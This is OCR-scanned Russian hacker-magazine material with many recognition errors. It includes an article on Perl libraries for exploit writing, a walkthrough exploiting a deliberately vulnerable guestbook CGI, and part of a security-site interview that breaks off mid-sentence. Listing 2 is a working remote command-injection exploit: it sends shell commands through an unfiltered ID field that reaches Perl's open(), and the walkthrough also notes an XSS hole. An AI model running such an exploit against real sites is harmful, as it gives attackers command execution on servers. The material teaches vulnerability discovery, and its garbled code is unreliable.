«родном» для Perl скриптовом стиле. Существует 
много способов сделать одно и то же, и для каждой 
конкретной задачи ты волен выбирать тот инстру- 
мент, который тебе представляется самым подходя- 
щим — это основная идеология Perl. Mano того, по 
количеству возможностей это один из самых богатых 
языков — одни регулярные выражения чего стоят. 
Следует отметить, что на Рей можно писать очень ко- 
роткие и при этом чрезвычайно функциональные 
скрипты. Помимо этого, язык позволяет развивать 
нехилую скорость разработки, в сравнении с тем 
же С, обладая, как уже было сказано, вполне доста- 
точной функциональностью. Например, я, да инея 
один, часто использую Perl для написания прикидоч- 
ного макета будущей утилиты. И как только стано- 
вится ясно, как следует организовать код и какие 
возможны узкие места, можно приступать к перепи- 
сыванию кода на компилируемом языке (например, 
С), если, конечно, скорость выполнения является 
критичной. Ах да, совсем забыл: основной и самый 
жирный бонус Perl — это склад готовых решений на 
все случаи жизни — СРАМ (подробней читай на врез- 
ке). Если возникает желание написать «какую-ни- 
будь полезную библиотечку», то с большой вероят- 
ностью что-то подобное уже есть на СРАМ. Еще Perl 
позволяет осуществлять работу с системой на низ- 
ком уровне (к примеру, реализована работа с сис- 
темными вызовами и сигналами Unix, что может 
быть крайне полезно при написании эксплойтов). 


Hy и, наконец, Perl обладает неиллюзорной перено- 
симостью, что также чрезвычайно важно. Если воз- 


никнет необходимость запустить удаленный 
эксплойт на каком-либо шелле, это получится почти 
наверняка, невзирая на установленную на шелле 
операционную систему. Конечно, если код не будет 
опираться на особенности конкретной операционки, 
и на нужной нам машине будет установлен Реп-ин- 
терпретатор. Об особенностях Рей можно говорить 
очень долго, но данная статья немного не об этом :). 
В общем, я уверен, что всем, кто только начинает пи- 
сать свои эксплойты, стоит попробовать делать это 
на Perl, как на самом выигрышном по соотношению 
«затраты/результат» инструменте. 
> простая работа с www. Что может нам в пер- 
вую очередь понадобиться при написании удаленно- 
го эксплойта на меб-интерфейс? Конечно же, воз- 
можность формировать НТТР-запросы и обрабаты- 
вать ответы. Например, при реализации эксплойта, 
использующего ЗОЁ-инъекцию или переполнение 
буфера (да и вообще, любую уязвимость, основан- 
ную на недостаточной фильтрации параметров web- 
скриптов), это, фактически, единственное, что нам 
понадобится. 

Первая библиотека, которая нам пригодится — 
LWP (LWP — The World-Wide Web library for Perl). 
По названию уже примерно понятно, что с помощью 
этой библиотеки можно работать с www, и сейчас мы 
выясним, как именно это делается. Итак, эта библи- 
отека представляет собой набор модулей для прос- 
той работы с WWW: с ее помощью мы можем форми- 
ровать запросы к каким угодно стандартным серви- 
сам (ftp, http, file, smtp, etc.) идаже посылать е-тай'ы. 
Однако надо помнить, что проверка правильности 
запросов целиком ложится на нас, так как сам LWP- 
модуль не гарантирует, что, послав кривой запрос на 
какой-либо сервер, ты получишь хоть какой-то ответ. 
Работа этого модуля основана на HTTP-style соеди- 
нении, то есть соединении по типу «запрос-ответ». 
Работает все это очень просто. В начале мы форми- 
руем объект запроса HT TP::Request (не стоит пугать- 
ся упоминания протокола НТТР в названии класса — 


он указывает на используемую идеологию соедине- 
ния и никак не ограничивает их возможный тип), пос- 
ле чего передаем его в метод request класса 
LWP::UserAgent, который представляет собой интер- 
фейс, скрывающий всю низкоуровневую работу 
с сетью и возвращающий ответ в виде объекта 
HTTP::Response. Сам по себе объект LWP::UserAgent 
содержит много атрибутов, которые конфигурируют 
его взаимодействие с сетью. В частности, при рабо- 
те с НТТР некоторые атрибуты встраиваются 
в НТГР-заголовок. Рассмотрим основные атрибуты 
объекта HTTP::Request: 


—` METHOD — СТРОКА, 
ИДЕНТИФИЦИРУЮЩАЯ ТИП ЗАПРОСА 
(НАИБОЛЕЕ ЧАСТО ИСПОЛЬЗУЮТСЯ 
POST, GET, PUT ИТ.Д.). 


“~ URI (UNIFORM RESOURCE IDENTIFIER) — 
СТРОКА, СОДЕРЖАЩАЯ ПРОТОКОЛ, 
СЕРВЕР И ИМЯ ЗАПРАШИВАЕМОГО 
«ДОКУМЕНТА», КОТОРАЯ МОЖЕТ 
СОДЕРЖАТЬ И ДРУГИЕ ПАРАМЕТРЫ, 
ОБРАБАТЫВАЕМЫЕ СЕРВЕРОМ, 
НАПРИМЕР, «HTTP:://MEGASITING.EE:- 
8080/SCRIPT.CGI?7PARAM=PAM&PAM=PAM>». 


“~ HEADERS — В ОБЩЕМ СЛУЧАЕ — 
ДОПОЛНИТЕЛЬНАЯ ИНФОРМАЦИЯ 
О ЗАПРОСЕ В ВИДЕ ПАР 
«КЛЮЧ-ЗНАЧЕНИЕ». В СЛУЧАЕ 
НТТР-СОЕДИЕНИЯ — ПАРАМЕТРЫ 
ЗАГОЛОВКА. 


— СОМТЕМТ — ДАННЫЕ, ЕСЛИ ОНИ 
НЕОБХОДИМЫ. 
ОТВЕТ СЕРВЕРА, КАК УЖЕ БЫЛО 
УПОМЯНУТО — ЭТО ОБЪЕКТ 
HTTP::RESPONSE, СОДЕРЖАЩИЙ 
СЛЕДУЮЩИЕ ПАРАМЕТРЫ, ДОСТУПНЫЕ 
С ПОМОЩЬЮ ОДНОИМЕННЫХ МЕТОДОВ: 


1 CODE — КОД ОТВЕТА СЕРВЕРА (200 — 
ВСЕ НОРМАЛЬНО, 404 — FILE 

NOT FOUND, 500 — ОШИБКА 

ПРИ ОБРАБОТКЕ СКРИПТА...); 


2 MESSAGE — КРАТКОЕ ПОЯСНЕНИЕ КОДА 
ВОЗВРАТА (В УДОБОЧИТАЕМОЙ ФОРМЕ); 


3 HEADERS — ПАРАМЕТРЫ ЗАГОЛОВКА 
ОТВЕТА. В ОБЩЕМ СЛУЧАЕ — ОПИСАНИЕ 
КОНТЕНТА; 


4 СОМТЕМТ — СОБСТВЕННО, ДАННЫЕ. 


Продемонстрируем, как все это работает на приме- 
ре доступа к НТТР-серверу (листинг 1). 

Как мы видим, все очень просто. В первой строч- 
ке мы подключаем модуль LWP::UserAgent, после чего 
создаем новый объект. Надо заметить, что конструкто- 
ры в Perl обычно понимают гибкий набор параметров. 
Это связано с особенностями реализации ОО-подхода 
и способом передачи параметров в методы класса (мы 
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не будем углубляться в эту тему в рамках данной 
статьи, так как она тянет на отдельный спец-выпуск). 
Например, LWP::UserAgent может принимать в качест- 
ве параметров пустой список или набор из пар «ключ- 
значение»: LWP::UserAgent->new(from-—'pupkin @ gov.no’, 
agent->'MyMegaMailSender/2.5.7’, ...) # при формирова- 
нии SMTP-sanpoca. 

В третьей строке приведенного листинга 
мы меняем один из атрибутов запроса — agent, ко- 
торый служит для идентификации нашего прило- 
жения. В случае НТТР-запроса, этот атрибут встра- 


CPAN (Comprehensive 
Perl Archive Network) 


CPAN (COMPREHENSIVE PERL ARCHIVE 
NETWORK) — ЭТО ОГРОМНЫЙ АРХИВ 
ВСЕВОЗМОЖНОГО СОФТА НА PERL И ДО- 
КУМЕНТАЦИИ К НЕМУ, КОТОРЫЙ РАСПО- 
ЛАГАЕТСЯ ПО АДРЕСУ СРАМ.ОВС. СТРА- 
НИЦА SEARCH.CPAN.ORG — САМАЯ ПО- 
СЕЩАЕМАЯ СТРАНИЦА М/ЕВ-РАЗРАБОТ- 
ЧИКА, ИСПОЛЬЗУЮЩЕГО В СВОЕЙ РАБО- 
ТЕ PERL. ОНА СОДЕРЖИТ ВСЮ HEOBXO- 
ДИМУЮ ДОКУМЕНТАЦИЮ ПО СТАНДАРТ- 
НЫМ ВОЗМОЖНОСТЯМ PERL И НЕВЕРО- 
ЯТНУЮ КУЧУ ВСЕВОЗМОЖНЫХ ГОТОВЫХ 
РЕШЕНИЙ, КОТОРЫЕ ОБЫЧНО ХОРОШО 
ДОКУМЕНТИРОВАНЫ. ЛИЧНО У МЕНЯ ОБ- 
ДУМЫВАНИЕ КАКОЙ-ЛИБО ЗАДАЧИ НА- 
ЧИНАЕТСЯ С ПОХОДА НА CPAN.ORG 

И ПОИСКА СООТВЕТСТВУЮЩИХ МОДУ- 
ЛЕЙ. ЧАЩЕ ВСЕГО НУЖНЫЕ МНЕ МОДУ- 
ЛИ НАХОДЯТСЯ, ЧТО ОЧЕНЬ, ОЧЕНЬ 
СИЛЬНО ЭКОНОМИТ ВРЕМЯ, КОТОРОЕ, 
КАК ИЗВЕСТНО — ДЕНЬГИ. ПО ШИРОКО 
РАСПРОСТРАНЕННОМУ МНЕНИЮ, 

СРАМ — ЭТО ЕДИНСТВЕННАЯ СТРАНИЦА, 
КОТОРАЯ НУЖНА ДЛЯ ПОЛНОЦЕННОЙ 
РАБОТЫ С PERL. ДОБАВИТЬ СВОЙ МО- 
ДУЛЬ В ЭТОТ АРХИВ МОЖЕТ КТО УГОД- 
НО, ЧТО ПОМИМО НЕСОМНЕННЫХ БЛАГ 
ПОРОЖДАЕТ И РЯД ПРОБЛЕМ. ИСПОЛЬ- 
ЗУЯ МОДУЛИ, СКАЧАННЫЕ С СРАМ, 

ТЫ ДЕЙСТВУЕШЬ НА СВОЙ СТРАХ 

И РИСК, ИБО ОНИ ПОСТАВЛЯЮТСЯ БЕЗ 
КАКИХ ЛИБО ГАРАНТИЙ. ЧАСТО БЫВАЕТ 
ТАК, ЧТО ЭТИ МОДУЛИ ПРОСТО-НАПРО- 
СТО НЕ РАБОТАЮТ. НО ВСЕ-ТАКИ ЗНАЧИ- 
ТЕЛЬНО БОЛЬШЕ ТЕХ, КОТОРЫЕ РАБО- 
ТАЮТ НОРМАЛЬНО. ЧТОБЫ ОЦЕНИТЬ 
МОЩЬ ЭТОГО АРХИВА, ПРЕДЛАГАЮ ТЕБЕ 
ЗАЙТИ НА SEARCH.CPAN.ORG И ПОПРО- 
БОВАТЬ ТАКИЕ ЗАПРОСЫ, КАК «WWW>, 
«МЕТ», «RSS» И ТАК ДАЛЕЕ. ДУМАЮ, 

ТЫ БУДЕШЬ УДИВЛЕН ОБИЛИЕМ ПРЕД- 
ЛАГАЕМЫХ РЕШЕНИЙ. БЕЗУСЛОВНО, 
СРАМ — ЭТО ОДИН ИЗ САМЫХ ВЕСОМЫХ 
ПЛЮСОВ PERL, КОТОРЫЙ ПОДОГРЕВАЕТ 
ЛЮБОВЬ ЕГО ПОКЛОННИКОВ. 
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ивается в заголовок, идентифицируя браузер. Да- 
лее мы формируем объект класса HTTP::Request 
и передаем его в качестве параметра в метод 
request, после чего обрабатываем полученный ре- 
зультат. Метод is_success (существует также об- 
ратный метод is_error) проверяет код ответа серве- 
ра и возвращает 1 в случае успеха. Думаю, скрипт 
достаточно прост и не требует дополнительных 
комментариев. 

Несмотря на то, что весь основной функцио- 
нал реализован в рамках объектно-ориентирован- 
ной концепции, есть возможность использовать и 
краткий процедурный интерфейс, которого может 
хватить в большинстве случаев. Реализована эта 
возможность в виде модуля LWP::Simple, в котором 
доступны следующие методы: 


— GET($URL) — ПОЛУЧАЕТ ДОКУМЕНТ, УКА- 
ЗАННЫЙ В $URL, ГДЕ $URL — СТРОКА; 


— HEAD($URL) — ПОЛУЧАЕТ ПАРАМЕТРЫ 
ЗАГОЛОВКА ОТВЕТА; 


— GETPRINT($URL) — ПОЛУЧАЕТ И РАСПЕ- 
ЧАТЫВАЕТ ОТВЕТ, ВОЗВРАЩАЕТ КОД 
ОТВЕТА СЕРВЕРА; 


— GETSTORE($URL, $FILE) — ПОЛУЧАЕТ 
И СОХРАНЯЕТ ОТВЕТ В $FILE, ВОЗВРА- 
ЩАЕТ КОД ОТВЕТА СЕРВЕРА. 


Вообще, библиотека эта достаточно мощная и мо- 
жет быть использована даже для написания своего 
маленького НТТР-сервера. Для подробного расска- 
за обо всех возможностях LWP потребовался бы 
объем всего журнала. Например, с помощью LWP 
можно работать через Ргоху, и много чего еще по- 
лезного делать. Однако идем дальше. 
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> — низкоуровневая работа с протоколами. Ecnu 
процессе написания эксплойта возникает необходи- 
мость спуститься с прикладного уровня ниже по стеку 
протоколов, то и тут Perl предоставит нам достаточ- 
ный набор инструментов. Для начала рассмотрим, как 
же организовать клиент-серверное соединение под 
Рен. Для решения этой задачи в стандартную постав- 
ку Perl включен пакет Ю::Зоскеф, который и обеспечи- 
вает базовую функциональность сокетов. Этот класс 
имеет множество подклассов, которые наследуют все 
его методы и обеспечивают более конкретную функ- 
циональность (например, Ю::Зоскее МЕТ для работы 
с ТСР- и УОР-сокетами, IO::Socket::SSL для работы с 
защищенным соединением итак далее). Помимо это- 
го класса, в Рей существует базовый модуль Socket, 
который просто реализует функционал стандартной 
С-библиотеки Socket.h и является модулем более низ- 
кого уровня, чем IO::Socket. 

Чтобы создать ТСР-клиент, который бы сое- 
динялся с каким-либо сервером, с помощью 10::$50- 
cket::INET, достаточно следующего простого кода: 


В первой строчке мы подключаем нужную библиоте- 
ку. Во второй строке мы вызываем конструктор клас- 
са Ю::Зоскее МЕТ со следующими параметрами: 


“~~ PEERADDR (СИНОНИМ PEERHOST) 
АДРЕС УДАЛЕННОГО СЕРВЕРА В ВИДЕ 
СТРОКИ 'XX.XX.XX.XX' ИЛИ ИМЕ- 

НИ СЕРВЕРА; 


—` PEERPORT — ОЧЕВИДНО, ПОРТ 
НАЗНАЧЕНИЯ; 


~~ PROTO — ПРОТОКОЛ, ПО КОТОРОМУ 
ПЛАНИРУЕТСЯ УСТАНОВИТЬ СОЕДИНЕ- 
НИЕ ('ТСР, 'UDP' И ТАК ДАЛЕЕ); 


™ ТУРЕ — ТИП COKETA. В НАШЕМ СЛУЧАЕ 
SOCK_STREAM (ПОТОКОВЫЙ СОКЕТ, 
ГАРАНТИРУЕТСЯ ДОСТАВКА ДАННЫХ — 
РЕЖИМ ВИРТУАЛЬНЫХ СОЕДИНЕНИЙ), 
ТАКЖЕ ВОЗМОЖНЫ ЗНАЧЕНИЯ 
SOCK_RAW (СИМВОЛЬНЫЙ, НЕСТРУКТУ- 
РИРОВАННЫЙ СОКЕТ) И SOCK_DGRAM 
(РЕЖИМ ПЕРЕСЫЛКИ ДАЙТАГРАММ). 


После открытия клиентского сокета мы можем ра- 
ботать с ним, как с файловым дискриптором, 
то есть также писать с помощью print и читать с по- 
мощью оператора <>. 

Для открытия сокета на ожидание соедине- 
ния (что вряд ли потребуется для написания 
эксплойта, но необходимо для полноты понима- 
ния), достаточно указать параметры Listen (макси- 
мальное количество потоков), Туре и LocalPort. 
Например, вот так: 


После открытия сокета на ожидание $server->accept() 
(это метод модуля IO::Socket) возвращает первое ус- 
тановленное соединение, с которым мы можем рабо- 
тать аналогично $socket из первого примера. Все то 
же самое можно сделать и на более низком уровне, 
используя модуль Socket, который по своим возмож- 
ностям полностью аналогичен соответствующей биб- 
лиотеке С, так что man socket нам поможет. 

Следующий набор модулей, который может 
быть полезен — Net::*. Эти модули стоит использо- 
вать, если нужна работа со стандартными сервиса- 
ми, такими Kak Telnet, SMTP, FTP (Net::Telnet, 
Net::SMTP, Net::FTP соответственно). Помимо вы- 
шеперечисленных модулей, в рамках этой библио- 
теки реализована целая куча просто очень полез- 
ных модулей (Net::IP, Net:: TCP, Net:: HTTP, Net::Gen, 
Net:Inet ...), функционал которых понятен из назва- 
ния. Net::Gen и Net::Inet — работа с сокетами, 
Net::TCP — работа с 1ср-сокетами (поверх тех же 
Ме пе! и Net::Gen), Net::IP — расширение для все- 
возможных преобразований IP-agpecos, Net::HTTP — 
низкоуровневая работа с http на стороне клиента и 
так далее. 


Несколько слов о Net::HTTP. Этот модуль позво- 
ляет работать с позиции протокола, так сказать. 
То есть дает полный доступ к формированию 
НТТР-запроса, в отличие от LWP, который скры- 
вает подробности и служит для более простого и 
быстрого доступа к www-goKymMeHTam. Net::HTTP 
является подклассом 1О::Зоске: МЕТ, поэтому 
можно использовать методы последнего для пря- 
мого чтения из сокета и записи в сокет, наряду с 
функциями самого Net::HTTP. Использование 
Net::HTTP показано на следующем стандартном 


Помимо всего перечисленного, в случае, если необ- 
ходима действительно низкоуровневая работа с 
протоколами, стоит приглядеться к библиотеке 
NetPacket, которая включает такие модули, как 
NetPacket::Ethernet, NetPacket::TCP, NetPacket::IP, 
NetPacket::ICMP и так далее. 


use LWP: :UserAgent; 
my $963 = 
Sobj->agent ('MyExapmle/1.0'); 


LWP: :UserAgent->new(); 


Все модули этой библиотеки организованы 
одинаково. Метод decode соответствующего моду- 
ля принимает сырые данные и возвращает объект 
с разобранными данными. Этот объект содержит 
поля, которые соответствуют стандартным частям 
заголовка соответствующего протокола. Метод 
encode, в свою очередь, упаковывает данные, 
оформленные в виде объекта. Более подробная ин- 
формация содержится на соответствующих страни- 
цах СРАМ (http://search.cpan.org/search?query=NetPacket- 
&mode=all). 
> работа с низкоуровневыми возможностями 
системы. Для того чтобы продемонстрировать воз- 
можности Perl в низкоуровневой работе с системой, 
мы рассмотрим работу с сигналами и системными вы- 
зовами, хоть эти темы и не относятся напрямую к на- 
писанию эксплойтов. Начнем с сигналов. В Рей при- 
меняется очень простая модель работы с сигналами. 
Хэш %SIG содержит ссылки на определенные пользо- 
вателем обработчики, в качестве которых могут выс- 
тупать ссылки на блоки кода или ключевые слова. 

Например, строка $SIG{'INT'} = 'IGNORE' поз- 
волит защитить приложение от случайного нажатия 
Ctrl+C. Также, чтобы однозначно показать пользо- 
вателю, что скрипт против грубого с собой обраще- 
ния, можно написать что-то типа: 


Думаю, что здесь все ясно, — поехали дальше. 
Другая возможность, которая будет оценена 
С-программерами — это возможность работы нап- 


(1) 


my $req = HTTP: :Request->new(GET> 'http://www.xakep.ru'); 


my $result = Sobj->request ($req); 
if (Sresult->is_success) 


{ 


print 'Code: ' Sresult->code Naas 
print 'Message: ' Sresult->message 
print 'Headers: ' Sresult->headers. 


"\n": 
"\n"; 


foreach my $key ( keys(%{Sresult->headers}) ) 


{ 

print ' 1 Skey . ":" 

} 
} 
else 
{ 

print $result->status_line, 
} 
1; 


"\n"; 


Sresult->headers->{Skey} 


"\n"; 


рямую с самым базовым пользовательским интер- 
фейсом Unix — системными вызовами. Perl предос- 
тавляет интерфейс для работы с системными вызо- 
вами с помощью встроенной процедуры syscall, ко- 
торая используется следующим образом: 


Эта строчка вызывает системный вызов (прошу про- 
щения за тавтологию), заданный в первом элемен- 
те LIST в виде &$\$_имя_вызова, передавая в ка- 
честве параметров оставшиеся элементы списка. 
Необходимо знать, что Рей допускает только 14 па- 
раметров для системного вызова. В случае неудачи 
syscall возвращает -1 и устанавливает код ошибки в 
стандартную переменную $!, в случае успеха — 
возвращается значение, которое было возвращено 
самим системным вызовом. Рассмотрим следую- 
щий стандартный пример: 


Листинг вполне понятен, добавлю только, что функ- 
ция Непо возвращает файловый дескриптор по за- 
данному имени, а функция length возвращает дли- 
ну строки. Вот, собственно, и все, что нужно знать, 
чтобы работать с системными вызовами под Perl. 
Всякое остальное про системные вызовы можно уз- 
нать, используя волшебную команду тап. 
заключение. Очень надеюсь, что эта статья 
поможет тебе немного сориентироваться в сред- 
ствах, необходимых для написания эксплойтов на 
Perl. Естественно, в рамках статьи невозможно ос- 
ветить все, что необходимо для этого знать, так 
как помимо владения инструментами нужно еще 
понимать, что именно писать. Однако я надеюсь, 
что мне удалось расставить маячки, которые по- 
могут тебе в самообразовании. Напомню, что мы 
рассмотрели только самые основные инструмен- 
ты, которых, однако, должно хватить для очень 
многих реальных задач. В Рей более чем достаточ- 
но готовых библиотек, обладающих часто пересе- 
кающимся функционалом, что соответствует иде- 
ологии Perl (одно и то же действие может быть BbI- 
полнено различными способами), и только тебе 
решать, какой инструмент выбрать. Поэтому чи- 
тай, думай, пробуй! © 


+ 


Кстати, не надо думать, что найти подобный образ- 
чик невежества на просторах Сети тяжело. Вовсе 
нет, ибо даже в коде опытных программистов после 
пары бессонных ночей и десятка кружек кофе начи- 
нают проскакивать нефильтруемые поля или еще 
какие-нибудь признаки крайнего переутомления :). 

Итак, наша цель — выявить основные уязви- 
мости и написать эксплойт (ищи уязвимый Cgi 
на диске). Приступим. 

Для начала определимся, с чем мы имеем дело. 
Куча записей без какого-либо оформления и одна 
форма с двумя текстовыми полями и кнопкой — не гус- 
то. Однако мой богатый жизненный опыт подсказыва- 
ет, что даже такого малого количества потенциально 
уязвимых мест бывает достаточно для наличия крити- 
ческой ошибки. Свинья грязь найдет :). Сомнительно, 
чтобы столь примитивная конструкция работала на ос- 
нове СУБД, вероятно, мы имеем дело стипичной фай- 
ловой гестбукой, которую за пару дней по учебнику 
слепил «молодой специалист». Фактически, все, что 
мы можем сделать при исследовании веб-интерфей- 
са — определить, какие параметры доступны для из- 
менения, фильтруются ли они (если да, то как), их со- 
держимое, и насколько хорошо в скрипте организова- 
на обработка исключительных ситуаций (передача 
нестандартных параметров или параметров необыч- 
ной длины, изменение НТТР-метода с POST на СЕТ и 
обратно итак далее). Поэтому в начале исследования 
стоит проверить, фильтруется ли текст, вводимый 
пользователями в текстовое поле. Для этого мы заба- 
бахаем туда какой-нибудь НТМЁ-код (например, <a 
href=«www.xakep.ru»>Tbil</a> — не принципиально) 
и посмотрим на результат. Опубликовав сообщение, 
мы увидим оформленную ссылку. Значит, подстанов- 
ка текста происходит без проверки, в момент форми- 
рования шаблона страницы, и мы по своему разуме- 
нию можем кроить страницу, встраивая зловредные 
скрипты, которые будут выполнены на стороне других 
пользователей — Х$$! Присутствие такой дыры очень 
радует (о том, как ее использовать — читай весь этот 
номер), но она не дает нам никакого простора для 
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практики в написании эксплойтов, поэтому смотрим, 
что у нас есть еще. Слегка повеселев и расслабив- 
шись, обратимся к НТМЕ-коду нашей многострадаль- 
ной гостевой книги. 

Как мы видим, в HTML-koge каждого сообще- 
ния есть какие-то мутные поля <INPUT TYPE=«HID- 
DEN" NAME="ID» VALUE="1167069479"> и точно Ta- 
кое же поле есть в форме отправки сообщения. Об- 
новив несколько раз страницу, мы заметим, что чис- 
ло в параметре ID каждый раз возрастает. Я думаю, 
по виду этих странных ID уже понятно, что это такое, 
но не будем забегать вперед и попробуем отправить 
свое сообщение. Пишем трогательное послание 
«фсем в этом чати» и радостно жмем на «Отпра- 
вить». После обновления на странице появилась на- 
ша запись, значение скрытого поля которой стало 
равно 1167069479, то есть тому значению, которое 
изначально было в форме отправки сообщения, 
а в самой форме на месте этого числа появилось 
число 1167070058. Не буду тянуть резину, все и так 
уже догадались, что это число — время с момента 
начала эпохи в секундах — системное время Unix. 
Итак, время загрузки формы связывается с самой 
записью. Зачем это может быть сделано? Вероятно, 
наша гостевуха скроена из файлов, и таким образом 
горе-программер обеспечивает уникальность имени 
файла для каждой записи (вообще говоря, файлы 
тут вовсе не обязательны, но мы уже решили, что 
с большой вероятностью имеем дело именно с ни- 
ми). Зачем же нужно было передавать этот параметр 
в форму? Ну, скорее всего, это сделано для каких-то 
административных целей, возможно, для злобного 
модерирования. Однако оставим за кадром попытки 
разгадать тайну мышления программиста, написав- 
шего нашу гестбуку, и попробуем подумать, что мы 


можем сделать с этим параметром. А сделать мы 
сним можем всякое. Например, если параметр пере- 
дается в имя файла без фильтрации, либо если 
фильтрация выполнена криво, то это будет означать, 
что мы имеем все возможности для выполнения лю- 
бых команд в Shell'e с правами веб-сервера. Здесь 
нужно сделать ма-а-аленькое лирическое отступле- 
ние. Стандартная процедура open() в Рей может при- 
нимать не только имена файлов в виде строк, но и 
произвольные команды. Это очень удобно, если тре- 
буется выполнить внешнюю программу и получить 
ее вывод. Однако эта возможность таит в себе нехи- 
лую дыру. Чтобы посмотреть, как это работает, пред- 
лагаю сделать следующее: 


Поясню. Первой строчкой мы запускаем отладчик 
в минимальном режиме (в качестве отлаживаемо- 
го кода у нас минимально-допустимая строка — 
«0»), после чего в контексте отладчика выполняем 
пробный код (отладчик — это очень удобный способ 
быстрой проверки безумных идей). 

> — результаты выполнения команд в контексте от- 
ладчика. Думаю, полученные результаты в коммента- 
риях не нуждаются. Грубо, не вдаваясь в подробности: 
мы выполняем внешнюю программу и создаем рре 
с выходом на файловый дескриптор. Принципиально 
все несколько иначе, но нас это сейчас не волнует. 
Итак. Проверяем, фильтруется ли интересующее 
нас поле и не ошиблись ли мы, предположив, что 
оно имеет отношение к имени файла, в котором 
хранится запись. Составим запрос: 


Геи 


Рисунок 1 


> параметр в нашем примере не фильтруется, 
а значит — празднику быть! Такой безалаберный 
подход к внешним данным дает нам карт-бланш на 
выполнение команд на стороне сервера. Собствен- 
но, вот мы и подошли к самому интересному. Каж- 
дый раз формировать запрос вручную — не наш 
метод, и мы намереваемся этот процесс как-то ав- 
томатизировать. Точнее, не просто автоматизиро- 
вать, но и выложить эксплойт в сеть на случай, ес- 
ли наш зло-программер захочет сделать продукт 
своего творчества общедоступным. Таким образом, 
мы завоюем почет и уважение среди секьюрити-ту- 
совки (сомнительно, честно говоря :)). Итак. Наш 
эксплойт будет принимать в качестве параметра 
URL дырявой гестбуки и выводить шеллоподобное 
приглашение для ввода команд, выводя результат 
на наш терминал. Таким образом, мы создадим 
полную иллюзию работы с шеллом. Однако стоит 
помнить, что наши похождения будут видны всем 
посетителям сайта, ибо мы, фактически, оставляем 
в качестве лога запись в книге на каждое свое 
действие, так что наш импровизированный шел на- 
до использовать быстро и только как первую сту- 
пень на пути к контролю над системой. Чтобы реа- 
лизовать эдакий шлюз между нами и сервером, нам 
понадобится библиотека LWP для формирования 
запросов и разбора ответов (более подробную ин- 
формацию об этой и других библиотеках смотри 
в этом же номере). Краткий код простого эксплойта 
приведен в листинге 2. Код очень несложный и ком- 
ментировать там, опять же, нечего. Создаем объект 
запроса, подставляя туда считанную с ввода коман- 
ду, получаем ответ и выводим его на терминал. Все- 
го-то! Я думаю, фильтрацию вывода для отсечения 
HTML и контроль ввода каждый сможет добавить 
сам. Мы написали простой эксплойт, который дает 
нам возможность выполнять произвольные коман- 
ды на стороне сервера 

Рассмотренный нами пример сознательно уп- 
рощен. Но было бы ошибкой думать, что такого ро- 
да просчеты не встречаются в реальности. Встреча- 
ются, и еще как! Конечно, в не столь рафинирован- 
ном виде, и, безусловно, придется попотеть, чтобы 
найти уязвимость в большом, профессиональном 
проекте, — HO на то нам и дана голова. В этой статье 
я рассмотрел сам процесс написания эксплойта — 
основные стадии работы над уязвимостью, в кото- 
рые необходимо вникнуть, чтобы создание эксплой- 
тов перестало ассоциироваться с какими-то недос- 
тижимыми вершинами мастерства. Какой вывод 
можно сделать из всего этого безобразия? Даже 
небольшая небрежность во второстепенном коде мо- 
жет пустить коту под хвост безопасность всей систе- 
мы. Ошибки есть в любом коде, нужно только уметь 
их искать. © 
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...обратимся нашей многос 
<html> 

<body> 

<TABLE ALIGN="CENTER"> 
<TR><TD>Date: Mon Dec 25 17:55:37 UTC 2006 

</TD></TR><TR><TD>Name: 

</ТО></ТВ><ТВ><Тр><РВЕ>Админ 

У нас появилась Мега-гестбука! </PRE></TD></TR><INPUT TYPE="HIDDEN" NAME="ID" 
VALUE="1167068903 

"> </TABLE><BR> <TABLE ALIGN="CENTER"> 

[...SKIPPED...] 

<BR> <FORM ACTION="/cgi-bin/guest/script.cgi" METHOD="POST"> 

Name: <INPUT TYPE="TEXT" NAME="name"><BR><BR> 

Введите свое сообщение :<ВВ> <TEXTAREA NAME="text" ROWS="15" COLS="50" WRAP="PHYST- 
CAL"> 

<INPUT TYPE="SUBMIT" УАГОЕ="Отправить" NAME="Send"> 


к HTML-xKogny 


адальной го 1 книги 


(1) 


<INPUT TYPE="HIDDEN" NAME="ID" VALUE="1167069479"> </FORM> 
</body> 
</html> 


(2) 


#!/usr/bin/perl -w 


use strict; 
use LWP: :UserAgent; 
my Sobj = LWP: :UserAgent->new(); 
my $req = ""; 
my Surl = shift; 
while(1) 

{ 

my $comm = ""; 

print “> "; 

Scomm = <STDIN>; 

chomp ($comm) ; 

my $query = 
Surl.'?Send=%D0%9E%D1%82%D0%BF%D1%80%D0%B0 %D0%B2%D0SB8%D1%82%D1S8C&text=1&name=1& 
ID='.$comm; 

print "\n".Squery."\n"; 

бгеа = HTTP: :Request->new(POST => ); 
my Sresult = $obj->request ($req) ; 
if ($result->is_success) 

{ 

print "ok!\n"; 

print Sresult->content; 

} 

} 

1; 
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Александр Антипов — 

В настоящий момент со- 
трудник компании Positive 
Technologies, занимается 
разработкой сайта securi- 
tylab.ru. Имеет массу про- 
фессиональных навыков 
по защите информации, 
а количество разных 
прослушанных курсов 

и полученных сертифика- 
тов исчисляется нес- 
колькими десятками. 

Из увлечений в последнее 
время — разве что шах- 
маты, да и то, потому что 
сын стал профессиональ- 
но ими заниматься 
(http://michael.antipov.name), 
и постоянно приходится 
его тренировать 


ПРАКТИЧЕСКИ У ВСЕХ 

КРУПНЫХ РАЗРАБОТЧИКОВ 

ЕСТЬ ПРОЕКТЫ ПО БЕЗОПАСНОСТИ, 
ГДЕ ОНИ ПУБЛИКУЮТ ИНФОРМАЦИЮ 
О НАЙДЕННЫХ УЯЗВИМОСТЯХ И 
ВЫКЛАДЫВАЮТ ОБНОВЛЕНИЯ. 
НЕКОТОРЫЕ ОБРАСТАЮТ 
НОВОСТНЫМИ ЛЕНТАМИ И 
СОБСТВЕННЫМИ СТАТЬЯМИ. 
КАКОЙ ТОГДА СМЫСЛ В ПРОЕКТАХ 
ТИПА SECURITYLAB.RU? 


АЛЕКСАНДР АНТИПОВ: Ничего такого особен- 
ного, чего нельзя было бы найти или прочитать 
в других местах. В общем-то, правильно, Security- 
Lab — это некий клуб по интересам, в котором со- 
бирается информация о безопасности, получен- 
ная из множества источников. Это позволяет по- 
сетителям значительно экономить время в поис- 
ках необходимой информации. 


ТО ЕСТЬ ЭТО, ПО СУТИ, АГРЕГАТОР 
ИНФОРМАЦИИ ИЛИ ЕСТЬ ОТЛИЧИЯ? 
СБОР, АНАЛИЗ И ОБРАБОТКА 
МАТЕРИАЛОВ ИДУТ ВРУЧНУЮ? 


АЛЕКСАНДР АНТИПОВ: Как и другой новостной 
ресурс, чаще всего мы сообщаем чужую инфор- 
мацию, а не создаем свою. Однако за последний 
год появилось множество уникальных аналитиче- 
ских материалов. Это совместные исследования с 
